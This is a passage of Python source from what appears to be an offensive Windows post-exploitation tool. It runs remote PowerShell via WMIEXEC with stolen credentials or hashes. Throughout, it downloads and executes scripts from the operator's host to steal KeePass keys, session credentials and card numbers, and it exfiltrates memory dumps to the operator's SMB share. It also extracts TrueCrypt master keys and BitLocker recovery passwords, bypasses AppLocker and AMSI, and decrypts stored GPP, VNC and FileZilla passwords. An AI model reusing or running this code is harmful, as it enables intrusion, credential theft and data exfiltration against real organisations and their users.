tmpResultList2\n    return results\n    '''\n    command=powershellCmdStart+\" -Command \\\"get-process | select name\\\"\"\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList1=[]\n    found=False\n    tmpResultList=results.split(\"\\n\")\n    for x in tmpResultList:\n        x=x.strip()   \n        if found==True:\n            #if x not in tmpResultList1:\n            tmpResultList1.append(x)     \n        if x==\"----\" :\n            found=True\n    return tmpResultList1\n    '''\n\ndef sessionGopher(targetIP,domain,username,password,passwordHash):\n    #command=powershellCmdStart+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/SessionGopher.ps1\\',\\'%temp%\\SessionGopher.ps1\\'); . %temp%\\SessionGopher.ps1; Invoke-SessionGopher -Thorough\"'\n    command=powershellCmdStart+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/SessionGopher.ps1\\',\\'%temp%\\SessionGopher.ps1\\'); . %temp%\\SessionGopher.ps1; Invoke-SessionGopher\"'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    if debugMode==True:\n        print comman\n    startSearch=False\n    tmpResultList=results.split(\"\\n\")\n    for x in tmpResultList:\n        if startSearch==True:\n            if len(x.strip())>0:\n                if \"FileZilla Sessions\" in x or \"WinSCP Sessions\" in x or \"SuperPuTTY Sessions\" in x or \"PuTTY Sessions\" in x or \"Microsoft RDP Sessions\" in x or \"PuTTY Private Key Files (.ppk)\" in x or \"Microsoft RDP Connection Files (.rdp)\" in x or \"RSA Tokens (sdtid)\" in x or \"Microsoft Remote Desktop (RDP) Sessions\" in x:\n                    print \"\\n\"\n                print x\n        if \"[+] Digging on PC02 ...\" in x:\n            startSearch=True\n    return results\n\ndef getCurrentUsers(targetIP,domain,username,password,passwordHash):\n    loggedInUsersList=[]\n    results=''\n    status=''\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    command=' Get-WMIObject -class Win32_ComputerSystem | select username'\n    if applockerBypass==True:\n        newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, command)\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd)   \n        if debugMode==True:\n            print newCmd\n            print results \n    else:\n        command=powershellPath+\" \"+powershellArgs+command\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    foundStart=False\n    loggedInUsersList=[]\n    for x in tmpResultList:\n        x=x.strip()            \n        if len(x)>0:\n            if foundStart==True:\n                if x not in loggedInUsersList:\n                    loggedInUsersList.append(x)                            \n            if '--------' in x:\n                foundStart=True\n    if len(loggedInUsersList)>0:\n        for x in loggedInUsersList:\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[logged in] \", bold, color=\"green\"))+\"| \"+x\n    return loggedInUsersList\n\ndef getKeepass(targetIP,domain,username,password,passwordHash):\n    tmpResultList=[]\n    tmpSchedName=generateRandomStr()\n    batFilename=generateRandomStr()+\".bat\"\n    tmpCmd=''    \n    #cmd=\" \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/KeeThief.ps1\\'); Get-KeePassDatabaseKey | Select-Object Database,Plaintext | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_keepass.txt\\\"\"\n    cmd=\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/KeeThief.ps1\\'); Get-KeePassDatabaseKey | Select-Object Database,Plaintext | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_keepass.txt\"\n    if applockerBypass==True:\n        randomCount=(randint(1, 2))\n        if randomCount==1:\n            tmpCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,cmd)\n        if randomCount==2:\n            tmpCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,cmd)\n        if randomCount==3:\n            tmpCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,cmd)\n\n        if debugMode==True:\n            print tmpCmd\n    tmpProcessList=listProcesses(targetIP,domain,username,password,passwordHash)\n    if \"KeePass.exe\" in str(tmpProcessList):\n        selectedUsername=''\n        selectedPassword=''\n        selectedDomain=''\n        tmpCurrentUserList=getCurrentUsers(targetIP,domain,username,password,passwordHash)\n        if len(tmpCurrentUserList)>0:\n            selectedUsername=tmpCurrentUserList[0]\n        if len(selectedUsername)>0:\n            target = open(batFilename, 'w')\n            if applockerBypass==True:                \n                target.write(tmpCmd)\n            else:\n                target.write(powershellPath+\" \"+powershellArgs+\" \"+cmd)\n            target.close()\n            uploadFile(batFilename,batFilename,targetIP, domain, username, password, passwordHash)\n            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n            if debugMode==True:\n                print command\n                print results\n            command='schtasks.exe /Create /RL HIGHEST /RU '+selectedUsername+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /F /TR \"'\"C:\\\\windows\\\\temp\\\\\"+batFilename+\"\\\"\"\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)   \n            if debugMode==True:\n                print command\n                print results\n            command='schtasks /Run /TN '+tmpSchedName    \n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n            if debugMode==True:\n                print command\n                print results\n            checkComplete=False\n            while checkComplete==False:\n                command='schtasks /Query /TN '+tmpSchedName\n                results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                if debugMode==True:\n                    print command\n                    print results\n                if \"Ready\" in str(results):\n                    command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                                    \n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    if debugMode==True:\n                        print command\n                        print results\n                    checkComplete=True\n                else:\n                    time.sleep(10)\n            time.sleep(2)\n            tmpFilename=origScriptPath+\"/loot/\"+targetIP+'_keepass.txt'\n            if os.path.exists(tmpFilename):\n                with open(tmpFilename) as f:\n                    content = f.readlines()     \n                    tmpFound=False                    \n                    tmpCount=0\n                    for y in content:\n                        y=str(y).strip()\n                        if tmpCount>2:\n                            if len(y)>3:\n                                if y not in tmpResultList:\n                                    tmpResultList.append(y)       \n                        tmpCount+=1\n    else:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[keepass] | \", bold, color=\"green\"))+\"KeePass process not found\"\n    return tmpResultList\n\ndef getTruecrypt(targetIP,domain,username,password,passwordHash):\n    '''\n    #Additional profiles for volatility\n    Win7SP1x86\n    Win10x64\n    Win10x86\n    Win2008R2SP1x64\n    Win2012R2x64\n    Win7SP1x86\n    Win7SP1x64\n    Win8SP1x64\n    '''\n    tmpResultList1=[]\n    tmpCmd=''\n    command=''\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    tmpProcessList=listProcesses(targetIP,domain,username,password,passwordHash)\n    if \"TrueCrypt.exe\" in str(tmpProcessList):\n        uploadFile('DumpIt.exe','DumpIt.exe',targetIP, domain, username, password, passwordHash)\n        s=\"\"\"\n        $driveinfo=get-wmiobject win32_volume | where { $_.driveletter -eq 'C:' } | select-object freespace, capacity, drivetype, driveletter\n        $WarningLevel=$driveinfo.freespace/(1024*1024*1024)\n        if ($WarningLevel -gt 5)\n        {\n            $sOS =Get-WmiObject -class Win32_OperatingSystem \n            (New-Object Net.WebClient).DownloadFile('http://%s:8000/DumpIt.exe','C:\\\\windows\\\\temp\\\\DumpIt.exe')\n            $ip=get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} \n            $newFilename=\"%s_memory_\"+$sOS.Version+\"_\"+$sOS.OSArchitecture +\"_\"+$sOS.ServicePackMajorVersion +\".raw\"\n            Write-Output $newFilename\n            $exe = &\"C:\\\\windows\\\\temp\\\\DumpIt.exe\" \"/Q\" \"/O\" \"c:\\\\windows\\\\temp\\\\$($newFilename)\"\n            $exe\n            Move-Item -Path \"C:\\\\windows\\\\temp\\\\$($newFilename)\"  -force -Destination \"\\\\\\\\%s\\\\guest\\\\$($newFilename)\"\n        }\"\"\" % (myIP,targetIP,myIP)\n        encodedPS=powershell_encode(s)\n        if applockerBypass==True:\n            command = \"c:\\\\windows\\\\tasks\\\\powershell.exe -ep bypass -ec \"+encodedPS\n            if debugMode==True:\n                print command\n            '''\n            randomCount=(randint(1, 3))\n            if randomCount==1:\n                tmpCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,command)\n            if randomCount==2:\n                tmpCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,command)\n            if randomCount==3:\n                tmpCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,command)\n            if debugMode==True:\n                print tmpCmd\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, tmpCmd)    \n            '''\n        else:\n            command=\"powershell.exe -ep bypass -ec \"+encodedPS\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)                \n        if debugMode==True:\n            print results\n        if 'This program is blocked by group policy. For more information, contact your system administrator.' in str(results):\n            print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[powershell]\", color=\"green\"))+\" | Blocked By AppLocker\"\n        else:\n            tmpFileList=glob.glob(origScriptPath+\"/loot/\"+targetIP+\"_memory_*.raw\")\n            for filename in tmpFileList:\n                tmpIP=filename.split(\"_\")[0]\n                tmpVer=filename.split(\"_\")[2]\n                tmpArch=filename.split(\"_\")[3]\n                tmpSP=(filename.split(\"_\")[4]).split(\".raw\")[0]\n                if tmpArch==\"64-bit\":\n                    tmpArch=\"x64\"\n                if tmpArch==\"32-bit\":\n                    tmpArch=\"x32\"\n                if tmpVer==\"6.1.7601\":\n                    tmpVer=\"Win7\"\n                if tmpSP==\"1\":\n                    tmpSP=\"SP1\"\n                volProfile=tmpVer+tmpSP+tmpArch\n                cmd = \"python \"+pathVolatility+\"/vol.py -f \"+filename+\" --profile=\"+volProfile+\" truecryptmaster\"            \n                cmdList=cmd.split(\" \")\n                resultList=subprocess.check_output(cmdList)\n                if debugMode==True:\n                    print cmd\n                    print resultList\n                tmpResultList=resultList.split(\"\\n\")\n                found=False\n                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[truecrypt]\", color=\"green\"))+\" | Dumping Master Keys\"\n                for x in tmpResultList:\n                    if found==True:\n                        if \"0xfffff\" in x:\n                            print x\n                    if \"Master Key\" in x:\n                        found=True\n\n\ndef getBitlockerKeys(targetIP,domain,username,password,passwordHash):\n    tmpResultList=[]\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" -Command \\\"Get-BitLockerVolume |  Select-Object MountPoint,VolumeStatus\\\"\"\n    if debugMode==True:\n        print command\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    if \"FullyEncrypted\" in str(results):\n        command=powershellPath+\" \"+powershellArgs+\" -Command \\\"(Get-BitLockerVolume -MountPoint C).KeyProtector.recoverypassword\\\"\"\n        if debugMode==True:\n            print command\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n        tmpResultList=results.split(\"\\n\")\n        return tmpResultList\n    else:\n        print \"[*] No Bitlocker volumes found on host: \"+targetIP\n        return tmpResultList\n\ndef memCredDump(targetIP,domain,username,password,passwordHash,processName):\n    command=powershellCmdStart+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/mem_scraper.ps1\\',\\'%temp%\\mem_scraper.ps1\\');%temp%\\mem_scraper.ps1 -Proc '+processName+'\"'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results[0].split(\"\\n\")\n    return tmpResultList\n\ndef diskCredDump(targetIP,domain,username,password,passwordHash):\n    tmpResultList1=[]\n    results=''\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    amsiBypassStr=\"[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)\"\n    s=\"GET-WMIOBJECT -query \\\"SELECT * from win32_logicaldisk where DriveType = '3'\\\" | Select-Object DeviceID | ft -HideTableHeaders\"\n    encodedPS=powershell_encode(s)\n    #command = powershellPath+\" -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n    command=\" -ec \\\"\"+encodedPS\n    #command=powershellPath+\" \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz-obfs.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n    if applockerBypass==True:  \n        chosenNumber=2\n        newCmd=''\n        if chosenNumber==1:\n            newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash, command)\n        if chosenNumber==2:\n            newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, command)\n            print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[applocker]\", color=\"green\"))+\" | AppLocker Bypass Technique 3\"    \n        if chosenNumber==3:\n            newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash, command)\n\tnewCmd=newCmd.replace('-Command \"','')\n\tif debugMode==True:\n\t\tprint newCmd\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd) \n    else:\n        command=powershellPath+\" -ep bypass \"+command\n\tcommand=command.replace('-Command \"','')\n\tif debugMode==True:\n\t\tprint command\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    if 'This program is blocked by group policy. For more information, contact your system administrator.' in results:\n        print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[powershell]\", color=\"green\"))+\" | Blocked By AppLocker\"\n    else:\n        tmpResultList=results.split(\"\\n\")\n        tmpDriveList=[]    \n        for x in tmpResultList:\n            x=x.strip()\n            if len(x)==2:\n                tmpDriveList.append(x)\n        if len(tmpDriveList)>0:\n            if \"The system cannot find the path specified\" not in str(tmpDriveList):\n                print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[PAN]\", color=\"green\"))+\" | Searching disks: \"+\" \".join(tmpDriveList)\n            #print \"\\n\"\n        #if obfuscatedMode==True:  \n        #    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 [mimikatz][obfs] | Enable Powershell Obfuscation\"\n        for driveNo in tmpDriveList:\n            #if obfuscatedMode==False:\n            #command=' -Command \"'+amsiBypassStr+';(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\\"'        \n            #command=powershellPath+' '+powershellArgs+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\\"'        \n\t    #command=powershellPath+' '+powershellArgs+' \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\\"'        \n\t    #command=powershellPath+' \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\\"'        \n\t    command=' (New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\'        \n\t    if debugMode==True:\n\t\tprint command\n            #    command=' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder-obfs.ps1\\',\\'%temp%\\credit-card-finder-obfs.ps1\\');%temp%\\credit-card-finder-obfs.ps1 -path '+driveNo+'\\\\\\\\\"'        \n            if applockerBypass==True:  \n                chosenNumber=2\n                newCmd=''\n                if chosenNumber==1:\n                    newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash, command)\n                if chosenNumber==2:\n                    newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, command)\n                if chosenNumber==3:\n                    newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash, command)\n                if debugMode==True:\n                    print newCmd\n                results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd) \n            else:\n\t\tcommand=powershellPath+' \"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/credit-card-finder.ps1\\',\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path '+driveNo+'\\\\\\\\\"'        \n                results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n            #results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n            if debugMode==True:\n                print command\n                print results\n\t    print results\n            #tmpResultList=results[0].split(\"\\n\")\n            #for x in tmpResultList:\n            #    tmpResultList1.append(x)\n    #return tmpResultList1\n    return results\n    \ndef listRemoteShare(targetIP,domain, username, password):\n\n    deniedList = []\n    allowedList = []\n    conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n    conn.connect(targetIP, 445)  \n    folderDepth=3\n    try:\n        shares = conn.listShares()\n        for x in shares:\n            try:\n                shareName = x.name\n                if shareName != 'ADMIN$':\n                    count=0\n                    subDirectory=\"\"\n                    subDirectoryList=[]\n                    tmpsubDirectoryList=[]\n                    while count<int(folderDepth):\n                        if count==0:\n                            sharedfiles = conn.listPath(shareName, '/'+subDirectory)\n                            for y in sharedfiles:\n                                if y.filename != '.' and y.filename != '..' and y.isDirectory==True and y.filename!='Windows' and y.filename!='Boot' and y.filename!='Public':\n                                #if y.filename != '.' and y.filename != '..' and y.isDirectory==True:\n                                    subDirectoryList.append(y.filename)\n                                    try:\n                                        conn.listPath(shareName, '/'+y.filename)\n                                        #names = conn.listPath(shareName, '/' + y.filename)\n                                        if [targetIP, username, password,shareName + '/' + y.filename] not in allowedList:\n                                            allowedList.append([targetIP,username, password, shareName + '/' + y.filename])\n                                    except:\n                                        if [targetIP, username, password, shareName + '/' + y.filename] not in deniedList:\n                                            deniedList.append([targetIP, username, password, shareName + '/' + y.filename])\n\n                        else:\n                            tmpsubDirectoryList = subDirectoryList\n                            subDirectoryList=[]\n                            for z in tmpsubDirectoryList:\n                                try:                                    \n                                    if not z.startswith(\"/\"):\n                                        sharedfiles = conn.listPath(shareName, '/'+z)   \n                                    else:\n                                        sharedfiles = conn.listPath(shareName, z)   \n                                    for g in sharedfiles:        \n                                        #print g.filename\n                                        if g.filename != '.' and g.filename != '..' and g.isDirectory==True:   \n                                            subDirectoryList.append(z+\"/\"+g.filename)\n                                            #subDirectoryList.append(\"/\"+z+\"/\"+g.filename)\n                                            try:                                                                                                \n                                                conn.listPath(shareName, '/'+  z + \"/\" + g.filename)\n                                                if [targetIP, username, password,shareName + '/' +  z + \"/\" + g.filename] not in allowedList:\n                                                    allowedList.append([targetIP,username, password, shareName + '/' + z + \"/\" + g.filename])\n                                            except:\n                                                if [targetIP, username, password, shareName + '/' + z + \"/\" + g.filename] not in deniedList:\n                                                    deniedList.append([targetIP, username, password, shareName + '/' + z + \"/\" + g.filename])\n                                except Exception as e:\n                                    continue\n\n                        count+=1\n            except Exception as e:\n                continue\n    except Exception as e:\n        if \"Failed to list shares: Unable to connect to IPC$\" in e:\n            print \"[Error] Failed to list shares: Unable to connect to IPC$\"\n        else:\n            print e\n    return (allowedList, deniedList)\n\ndef getInstalledPrograms(targetIP,domain,username,password,passwordHash):\n    osArch64=True\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=\" \\\"Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName\\\"\"\n    if applockerBypass==True:\n        newCmd=''\n        randomCount=(randint(1, 3))\n        if randomCount==1:\n            newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==2:\n            newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==3:\n            newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,command)\n        if debugMode==True:                        \n            print newCmd\n        results,status=runWMIEXEC(targetIP,domain,username,password,passwordHash,newCmd)\n        if debugMode==True:   \n            print command\n            print results\n    else:\n        command=powershellPath+\" \"+powershellArgs+\" -command \\\"Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName\\\"\"\n        results,status=runWMIEXEC(targetIP,domain,username,password,passwordHash,command)\n        if debugMode==True:   \n            print command\n            print results\n    #results=runRemoteCMD(targetIP,domain,username,password,passwordHash,command)\n    tmpResultList1=[]\n    if \"FullyQualifiedErrorId\" not in str(results):\n        count=0\n        tmpResultList=results.split(\"\\n\")\n        for x in tmpResultList:\n            x=x.strip()\n            if count>2 and len(x)>0:  \n                tmpResultList1.append([targetIP,x])         \n            count+=1\n        return tmpResultList1\n    else:\n        return []\n\ndef readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath,selectedKey):\n    regHandler = RegHandler(targetIP,domain,username,password,passwordHash,keyPath,selectedKey)\n    try:\n        (results, status) = regHandler.run(targetIP, targetIP)\n        if 'ERROR_FILE_NOT_FOUND' in results:\n            if passwordHash != None:\n                tmpRegResultList2.append([targetIP,'Missing Key',username,passwordHash,keyPath + '\\\\' + selectedKey,None])\n            else:\n                tmpRegResultList2.append([targetIP,'Missing Key',username,password,keyPath + '\\\\' + selectedKey,None])\n        if 'Invalid root key HKCU' in results:\n            tmpRegResultList2.append([targetIP, 'Missing Key', keyPath + '\\\\' + selectedKey, None])\n        if status == True:\n            return results\n    except Exception, e:\n        print e\n\ndef downloadFile(targetIP,domain,username,password,filePath):  \n    lootPath=origScriptPath+\"/loot\"\n    tmpFilePath=filePath.split(\":\\\\\")\n    shareName=tmpFilePath[0]+\"$\"    \n    filePath=tmpFilePath[1]\n    filePath=filePath.replace(\"\\\\\",\"/\")  \n    if not filePath.startswith(\"/\"):\n        filePath=\"/\"+filePath  \n    try:\n        conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n        connected = conn.connect(targetIP, 445)\n        if connected == True:\n            try:\n                if not os.path.exists(lootPath):\n                    os.mkdir(lootPath)\n                file_obj = tempfile.NamedTemporaryFile(delete=False)\n                tempFilename = tempfile.NamedTemporaryFile(dir='.').name\n                tempFilename=targetIP+\"_\"+tmpFilePath[0]+\"_\"+filePath.replace(\"/\",\"_\")\n                file_obj = open(lootPath+\"/\"+tempFilename, 'w')\n                (file_attributes, filesize) = conn.retrieveFile(shareName,filePath, file_obj)\n                file_obj.close()\n                return lootPath+\"/\"+tempFilename\n            except Exception as e:\n                #print e\n                return \"\"\n    except Exception as e:\n        return \"\"\n\ndef parseSiteManagerXML(filename):\n    #Sample https://raw.githubusercontent.com/synzox/dotfiles/master/.filezilla/sitemanager.xml\n    resultList = []\n    with open(filename, 'r') as myfile:\n        data = myfile.read().replace('\\n', '')\n        result = xmltodict.parse(data)\n        if isinstance(result['FileZilla3']['Servers'],dict)==True:\n            tmphostNo=\"\"\n            tmpportNo=\"\"\n            tmpusername=\"\"\n            tmppassword=\"\"\n            for k1, v1 in result['FileZilla3']['Servers'].iteritems():\n                if k1=='Server':\n                    if isinstance(v1,list):\n                        for x in v1:\n                            if isinstance(x,dict):\n                                tmphostNo=x['Host']\n                                tmpportNo=x['Port']\n                                try:\n                                    tmpusername=x['User']\n                                except KeyError:\n                                    tmpusername=\"\"\n                                try:\n                                    tmppassword=x['Pass']\n                                except KeyError:\n                                    tmppassword=\"\"\n                                try:\n                                    tmpdecodedPassword=base64.b64decode(tmppassword)\n                                except TypeError:\n                                    tmpdecodedPassword=tmppassword\n                                if len(tmpusername)>0 and len(tmpdecodedPassword)>0:\n                                    resultList.append([tmphostNo+\":\"+tmpportNo, tmpusername, tmpdecodedPassword])\n    return resultList\n\ndef decryptUltraVNC(hashPassword):\n    try:\n        hashPassword = binascii.unhexlify(hashPassword)\n        desKey = \"\\xE8\\x4A\\xD6\\x60\\xC4\\x72\\x1A\\xE0\"\n        obj = Crypto.Cipher.DES.new(desKey, Crypto.Cipher.DES.MODE_ECB)\n        decrypt = obj.decrypt(hashPassword)\n        decrypt=decrypt.replace(\"\\x00\",\"\")\n        return decrypt\n    except Exception, e:\n        print e\n\ndef parseUltraVNC(filename):\n    #Sample https://raw.githubusercontent.com/justdan96/VNCappWrapper/master/ultravnc.ini\n    #Decrypt tool http://tools88.com/safe/vnc.php\n    resultList = []\n    passwd1 = ''\n    passwd2 = ''\n    with open(filename, 'r') as myfile:\n        data = myfile.read().splitlines()\n        for row in data:\n            tmpRow = row.strip()\n            if 'passwd' in row.strip().lower():\n                passwd1 = tmpRow.split('=')[1].strip()\n            if 'passwd2' in row.strip().lower():\n                passwd2 = tmpRow.split('=')[1].strip()\n        if len(passwd1) > 0 or len(passwd2) > 0:\n            passwd1 = decryptUltraVNC(passwd1[0:16])\n            passwd2 = decryptUltraVNC(passwd2[0:16])\n            resultList.append([passwd1, passwd2])\n    return resultList\n\ndef parseUnattendXML(filename):\n    #Sample http://www.itninja.com/question/how-do-i-add-a-custom-local-administrator-account-through-sysprep\n    tmpUserList=[]\n    try:\n        with open(filename, 'r') as myfile:\n            data = myfile.read().replace('\\n', '')\n            result = xmltodict.parse(data)\n            if isinstance(result['unattend']['settings'],list)==True:\n                for y in result['unattend']['settings']:\n                    if isinstance(y,dict)==True:\n                        for k1, v1 in y.iteritems():\n                            if k1=='component':\n                                if isinstance(v1,list)==True:\n                                    for z in v1:\n                                        for key, value in z.iteritems():\n                                           if key=='UserAccounts':\n                                                for k, v in value.iteritems():\n                                                    if k=='AdministratorPassword':\n                                                        tmpUsername='Administrator'\n                                                        tmpPassword=v['Value']\n                                                        if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                            tmpUserList.append([tmpUsername,tmpPassword])\n                                                    if k=='LocalAccounts':\n                                                        tmpUsername=v['LocalAccount']['DisplayName']\n                                                        tmpPassword=v['LocalAccount']['Password']['Value']\n                                                        if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                            tmpUserList.append([tmpUsername,tmpPassword])\n            else:\n                for key, value in result['unattend']['settings'].iteritems():\n                    if key=='component':\n                        if isinstance(value,list)==True:\n                            for x in value:\n                                for k1, v1 in x.iteritems():\n                                    if k1=='WindowsDeploymentServices':\n                                        for k2, v2 in v1.iteritems():\n                                            if k2=='Login':\n                                                tmpUsername=v2['Credentials']['Username']\n                                                tmpPassword=v2['Credentials']['Password']\n                                                if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                    tmpUserList.append([tmpUsername,tmpPassword]) \n\n    except:\n        print \"Error parsing unattend.xml file\"\n    return tmpUserList\n\ndef decryptGPP(cpassword):\n    #https://raw.githubusercontent.com/reider-roque/pentest-tools/master/password-cracking/gpprefdecrypt/gpprefdecrypt.py\n    # Key from MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2\n    key = (\"4e9906e8fcb66cc9faf49310620ffee8\" \n          \"f496e806cc057990209b09a433b66c1b\").decode('hex')\n    cpassword += \"=\" * ((4 - len(cpassword) % 4) % 4)\n    password = base64.b64decode(cpassword)     \n    # Decrypt the password\n    iv = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n    o = AES.new(key, AES.MODE_CBC, iv).decrypt(password)     \n    return o[:-ord(o[-1])].decode('utf16')\n \ndef getOSType():\n    import platform\n    return platform.system()\n\ndef mountSysvol(username,password):\n    #Sample cpassword=j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n    tmpPassList=[]\n    status,foundAdmin=testDomainCredentials(username,password,None,dcList[0],'WORKGROUP',True)\n    if status==True:\n        randomFoldername=generateRandomStr()\n        cmd = \"mkdir /tmp/\"+randomFoldername\n        resultList = runCommand(cmd, shell = True, timeout = 15) \n        cmd = \"umount /tmp/\"+randomFoldername\n        resultList = runCommand(cmd, shell = True, timeout = 15) \n        if getOSType()==\"Darwin\":\n            cmd = \"mount_smbfs  //\"+username+\":'\"+password+\"'@\"+dcList[0]+\"/sysvol /tmp/\"+randomFoldername\n        if getOSType()==\"Linux\":\n            cmd = \"mount -t cifs //\"+dcList[0]+\"/sysvol /tmp/\"+randomFoldername+\" -o username=\"+username+\",password=\"+password\n        resultList = runCommand(cmd, shell = True, timeout = 15) \n        if debugMode==True:\n            print cmd\n            print resultList\n        cmd = \"grep 